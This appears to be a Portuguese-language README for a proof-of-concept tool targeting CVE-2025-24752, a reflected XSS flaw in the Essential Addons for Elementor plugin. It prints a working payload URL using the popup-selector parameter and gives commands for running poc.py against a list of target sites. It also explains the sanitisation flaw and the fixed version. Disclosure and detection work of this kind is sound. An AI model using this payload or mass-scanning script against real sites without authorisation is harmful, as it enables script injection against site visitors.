
Olá, eu sou Chirag Artani. Este é o POC de Reflected XSS no Essential Addons for Elementor afetando 2+ Milhões de Sites - CVE-2025-24752
Esta ferramenta é apenas para fins de pesquisa e correção de segurança. Não a utilize para prejudicar sites. Se encontrar sites vulneráveis, reporte-os responsavelmente aos proprietários para que possam atualizar imediatamente.
Uma vulnerabilidade XSS refletida no Essential Addons for Elementor afeta mais de 100 mil sites que utilizam versões abaixo de 6.0.15. Foi atribuída a ela a CVE-2025-24752.
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1

pip install selenium webdriver-manager
python poc.py targets.txt
Um template de detecção perfeito para o plugin em assets está incluído: detect-elementor-for-xss.yaml
A vulnerabilidade ocorre devido à validação e sanitização insuficientes do argumento de consulta popup-selector, permitindo que um valor malicioso seja refletido de volta ao usuário. Corrigida na versão 6.0.15.
Para mais detalhes: Artigo Patchstack
Esta ferramenta é fornecida apenas para fins educacionais e de proteção. Sempre obtenha a devida autorização antes de testar qualquer site em busca de vulnerabilidades. O autor não se responsabiliza pelo uso indevido desta ferramenta.
Agradecemos aos pesquisadores de segurança responsáveis que identificaram e reportaram esta vulnerabilidade.